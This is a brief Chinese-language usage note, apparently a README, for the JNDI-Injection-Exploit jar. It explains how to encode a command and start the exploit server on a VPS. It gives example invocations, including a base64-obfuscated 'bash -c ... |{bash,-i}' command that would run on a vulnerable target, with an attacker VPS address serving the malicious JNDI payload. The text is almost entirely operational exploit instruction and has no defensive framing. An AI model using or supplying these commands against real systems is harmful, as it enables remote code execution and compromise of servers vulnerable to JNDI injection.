JNDI-Injection-Exploit-1.0-SNAPSHOT-all

将需要执行的命令编码

编码网站: https://www.jackson-t.ca/runtime-exec-payloads.html

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "dir" -A vps_ip

编码后在VPS执行即可

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,ZGly}|{base64,-d}|{bash,-i}" -A vps_ip

还有两个文件为Burp插件